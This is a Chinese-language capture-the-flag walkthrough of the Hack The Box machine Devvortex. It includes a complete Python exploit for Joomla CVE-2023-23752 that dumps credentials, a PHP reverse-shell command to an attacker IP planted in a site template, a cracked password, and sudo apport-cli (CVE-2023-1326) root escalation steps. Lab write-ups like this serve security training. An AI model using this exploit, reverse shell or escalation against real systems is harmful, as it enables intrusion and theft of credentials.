Devvortex
0x01 信息收集
1、使用nmap进行端口扫描
nmap -p- --min-rate 10000 10.10.11.242
nmap -sV -sC -A -p 22,80 10.10.11.242
2、将扫描出来的devvortex.htb域名写入到hosts文件中
3、使用浏览器访问网站进行信息收集,并且源码中没有发现什么有用的价值
4、使用gobuster对子域名爆破发现一个子域名
gobuster vhost -u devvortex.htb --append-domain -w names-129408.txt -t 100
5、添加hosts文件后使用浏览器访问
6、对两个网站页面使用dirsearch进行目录枚举,对结果进行分析查看
7、访问/administrator目录发现是一个Joomla的登录服务,并且在README.txt文件中知道版本为4.2
0x02 User
1、搜索该版本存在的漏洞发现有个最新的2023的CVE漏洞
Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?public=true&key=value) 进行未授权访问获取登录凭证
2、使用互联网中大佬的Poc对靶机进行攻击获取凭证
##CVE-2023-23752
import requests
import argparse
import csv
import json
timeout = 10
output = ""
proxy = {}
notColor = False
def inGreen(s):
return "\033[0;32m{}\033[0m".format(s)
def inYellow(s):
return "\033[0;33m{}\033[0m".format(s)
def readFile(filepath):
file = open(filepath, encoding='utf8')
return file.readlines()
def writeFile(filepath, data):
file = open(filepath, 'a', encoding='utf8')
filecsv = csv.writer(file)
filecsv.writerow(data)
def reqDatabase(url):
if url.rindex("/") == len(url) - 1:
url = "{}api/index.php/v1/config/application?public=true".format(url)
else:
url = "{}/api/index.php/v1/config/application?public=true".format(url)
payload = {}
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
response = requests.request("GET", url, headers=headers, data=payload, verify=False, proxies=proxy, timeout=timeout)
# print(response.text)
if "links" in response.text and "\"password\":" in response.text:
try:
rejson = json.loads(response.text)
user = ""
password = ""
for dataone in rejson['data']:
# print(dataone['attributes'])
if "user" in dataone['attributes']:
user = dataone['attributes']['user']
if "password" in dataone['attributes']:
password = dataone['attributes']['password']
if user != "" or password != "":
printBody = "[+] [Database] {} --> {} / {}".format(url, user, password)
if notColor:
print(printBody)
else:
print(inYellow(printBody))
if output.strip() != "":
writeFile(output + "_databaseUserAndPassword.csv", [url, user, password, response.text])
return url, response.text
except:
pass
def reqUserAndEmail(url):
if url.rindex("/") == len(url) - 1:
url = "{}api/index.php/v1/users?public=true".format(url)
else:
url = "{}/api/index.php/v1/users?public=true".format(url)
payload = {}
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
response = requests.request("GET", url, headers=headers, data=payload, verify=False, proxies=proxy, timeout=timeout)
if "username" in response.text and "email" in response.text:
try:
rejson = json.loads(response.text)
for dataone in rejson['data']:
username = ""
email = ""
# print(dataone['attributes'])
if "username" in dataone['attributes']:
username = dataone['attributes']['username']
if "email" in dataone['attributes']:
email = dataone['attributes']['email']
if username != "" or email != "":
printBody = "[+] [User&email] {} --> {} / {}".format(url, username, email)
if notColor:
print(printBody)
else:
print(inGreen(printBody))
if output.strip() != "":
writeFile(output + "_usernameAndEmail.csv", [url, username, email, response.text])
return url, response.text
except:
pass
def reqs(listfileName):
urls = readFile(listfileName)
for url in urls:
url = url.strip()
if url == "":
continue
reqDatabase(url)
reqUserAndEmail(url)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, default="", help="测试目标的 URL")
parser.add_argument('-l', '--listfile', type=str, default="", help="测试目标的地址文件")
parser.add_argument('-o', '--output', type=str, default="", help="输出文件的位置")
parser.add_argument('-p', '--proxy', type=str, default="", help="代理,如:http://localhost:1080")
parser.add_argument('-nc', '--notColor', type=bool, default=False, help="禁止带颜色的输出,如:-nc true")
opt = parser.parse_args()
args = vars(opt)
url = args['url']
urlFileName = args['listfile']
global output, proxy, notColor
output = args['output']
proxy['http'] = args['proxy']
proxy['https'] = args['proxy']
notColor = args['notColor']
if url != "":
reqDatabase(url)
if urlFileName != "":
reqs(urlFileName)
if __name__ == '__main__':
main()
3、使用获取到的凭证进行登录目录枚举发现的后台
4、翻看了半天后台发现有模板编辑修改的功能权限还是administrator
5、在本地使用nc监听1234端口,并在index.php模板中写入反弹shell命令保存,访问index.php即可反弹回shell
exec("/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.9/1234 0>&1'");
exec() 函数:这是一种在PHP中执行外部命令的函数
6、读取user的flag发现被拒绝了,flag放在一个叫做logan的用户下面
7、在/usr/bin目录中发现当前靶机运载着mysql,我们刚才使用的账号密码即是Database的凭证
8、升级shell并使用数据库账号凭证登录数据库
9、在joomla数据库中发现一个users表,并在其中发现lewis和logan用户的密码hash
10、使用john进行hash破解,获得密码为tequieromucho
11、使用ssh进行远程登录logan用户获取user的flag
0x03 Root
1、执行sudo -l查看授权的可执行操作,发现存在一个版本号为2.20.11的apport-cli
2、搜索发现当前版本存在一个CVE-2023-1326漏洞
3、利用该漏洞
执行了以下命令:sudo /usr/bin/apport-cli -c test.log less
apport-cli 命令的 -c 选项用于指定一个文件进行报告,并使用less打开它
当出现选项提示时,选择“V”查看报告,然后执行 bash 代码以获取 root 权限。
现在输入以下命令:!/bin/bash
4、获得了根访问权限,查看root中的flag